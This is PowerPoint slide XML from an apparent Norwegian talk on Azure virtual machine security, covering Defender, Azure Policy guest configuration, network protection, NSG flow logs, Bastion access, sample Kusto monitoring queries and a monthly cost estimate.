                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPFIX monitoring or known «bad» traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requries a service with public IP or LB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lisens for Defender for Endpoint (EDR) P1 eller P2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adaptive Application Control = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppLocker</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antimalware = free for Azure VM’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Innstalled trough Azure Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Solution with Dashboards via Log Analytics</a:t>
            </a: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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr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74109397-C574-4DDD-89B3-6F27CA573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46" y="1394651"/>
            <a:ext cx="3393024" cy="425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34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15C4-871D-414A-A6E3-384D85BD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50" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000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Azure Policy – Guest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8A3BF-6B6E-40E5-BF7C-3F23A84162EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="5854382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5475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4888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5213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r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Group Policy for Azure!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Based upon DSC for Windows / Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Will be replacing DSC in Automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GuestConfiguration Extension needs to be installed (Can also be done by its own Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provides machine with its own managed identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(If provisioned via the Azure Portal)</a:t>
            </a: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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA97FAD7-691E-4283-985B-6CB65A06F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939" y="1412674"/>
            <a:ext cx="6657975" cy="144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51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15C4-871D-414A-A6E3-384D85BD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876" y="406835"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Network and traffic flow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677466-D8AF-4E94-8B95-93843D470180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384777" y="450164"/>
            <a:ext cx="3995694" cy="585438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5475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4888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5213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r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS Protection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Protected OSI Layer 3&amp;4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Currently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expensive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Protects everything with its own public IP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Out of order packets are dropped at edge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Firewall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Layer 4 Statefull firewall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IPS/IDS and TLS inspection for east/west traffic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Threat intelligence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Support IP Groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NSG Regler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NIC / Subnet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Service Tags (Five-tuple) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO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nb-NO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B833C-7B63-4933-B1A2-8A780A5FF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532" y="1024499"/>
            <a:ext cx="7437513" cy="5401051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F2DD6099-FBA8-40A4-A04B-1A8FA2638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852" y="2948174"/>
            <a:ext cx="7256778" cy="343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3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637" y="274888"/>
            <a:ext cx="11102266" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Azure NSG Flow Logs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B12651-DDEF-4E4B-ACD8-26653C0FE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721" y="1415570"/>
            <a:ext cx="6562725" cy="4905375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261C2B2-131D-4518-92B4-A86205F7ABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="585438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5475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4888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5213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r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provides Insight into all network traffic going trough an NSG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data enriched by Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is traffic from a «bad» address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is traffic from another Azure service?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is traffic from a known location?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data will be availble in Log Analytics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And other fancy dashboards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can also use 3.party as Cisco Stealthwatch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AzureNetworkAnalytics_CL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	| where SubType_s == 'FlowLog’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 and FlowType_s == 'MaliciousFlow'</a:t>
            </a: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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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8C289ED-E77F-482F-9A7A-6D4F8D221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138" y="1460585"/>
            <a:ext cx="7355682" cy="386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15C4-871D-414A-A6E3-384D85BD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56" y="665515"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Who did changes to the VM?!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0C643-E1DD-45B3-A1EC-690B9335948B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="585438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5475" indent="-2698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4888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5213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r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Resource Locks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If you are using IaC you need to mace some adjustments to ensure locks are removed before modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change Analysis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Gir innsikt i endringer på Azure ressurser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Provices access into changes in Azure changes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Instead of trying to understanding all the JSON logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Activity Log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Should still be routed to Log Analytics for longtime retention</a:t>
            </a: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nb-NO" sz="2000" b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nb-NO" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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F974BEF8-5C45-4522-9E77-B72613933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12" y="1732473"/>
            <a:ext cx="6317362" cy="1988799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895344F4-1B51-4D08-B6BC-1F1DE6D783D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6044246" y="4032204"/>
            <a:ext cx="6097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b="1" dirty="0"/>
              <a:t>Kusto Query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>AzureActivity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>| where CategoryValue == "Administrative"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>| where ResourceGroup contains "noenoe-rg"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308943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b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Access to the virtual machines?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18615-6227-4736-BF99-68C52E5DDE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619649" y="1407026"/>
            <a:ext cx="625487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strike="sngStrike" dirty="0"/>
              <a:t>Offentlig IP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" strike="sngStrik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strike="sngStrike" dirty="0"/>
              <a:t>NAT IP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" strike="sngStrik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strike="sngStrike" dirty="0"/>
              <a:t>JIT (Just-in-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" strike="sngStrike" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" strike="sngStrike" dirty="0"/>
              <a:t>)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/>
              <a:t>Azure Bastion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dirty="0"/>
              <a:t>Support for native client with standard SKU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b="1" dirty="0"/>
              <a:t>CLI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t>az network bastion rdp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dirty="0"/>
              <a:t>Requires Reader Role on VMen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dirty="0"/>
              <a:t>Fun fact: Based upon Apache Guacamole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b-N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b="1" dirty="0"/>
              <a:t>Teleport or Cloudflare Access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dirty="0"/>
              <a:t>Supports other protocols (TCP/UDP)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dirty="0"/>
              <a:t>Supports integration with Azure AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 6" descr="Accessing private networks with Cloudflare Tunnel and WARP">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B78C950-EC09-46BB-BEFE-F3B033D0BE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3E7D32CC-ACA4-4F49-910F-DB39E9054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460" y="1569377"/>
            <a:ext cx="5723891" cy="25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09E30F-4A95-4EB8-B9FD-5DE2CA1BE242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="582730"/>
            <a:ext cx="4654968" cy="10254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b-NO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542BDF6-5876-406D-A9B3-52C32E7B1619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660977" y="1499497"/>
            <a:ext cx="4653922" cy="4074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>
                    <a:lumMod val="50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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardware and encryption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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RBAC and Managing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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring and logging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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Network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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus/Malware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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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chemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Run Scripts and Extensions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>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Defender for Servers and TVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412348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5793E-8E14-4A90-BE7D-52C4B0C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b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cool, so what does it cost? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Bilderesultat for my eyes burn">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB72AC6-224E-474D-AA93-23AD5F295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501" y="1748653"/>
            <a:ext cx="3998165" cy="399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04083621-DC9D-408C-9085-5731EDBC0197}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881207" y="1381393"/>
            <a:ext cx="590592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dirty="0"/>
              <a:t>Example: (per month)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
              <a:t>1 VM (4vCPU, 16GB) = 2800,-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/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
              <a:t>Storage, network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Backup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> (250 GB, 30 dager) = 193,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure Defender for 1 server = 120,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure Sentinel (~1-3 GB a month) = 51,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> (100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>IPer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>) = 25500,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure AD for PIM P2 = 77,- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure Traffic Analysis 1GB) = 30,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0" err="1"/>
              <a:t>Guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t> Configuration Azure Policy = 52,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure Bastion Standard SKU = 1834,-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" dirty="0"/>
              <a:t>Azure Automation (Free for 5 nodes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
              <a:t>Totalt = 27857,- (+ 2800) for the one machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1400" b="1" dirty="0"/>
              <a:t>But! Some big adjustments happening here soon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO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25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49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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E960DCA8-A2FC-48B3-AE5A-B42062258896}"/>
              </a:ext>
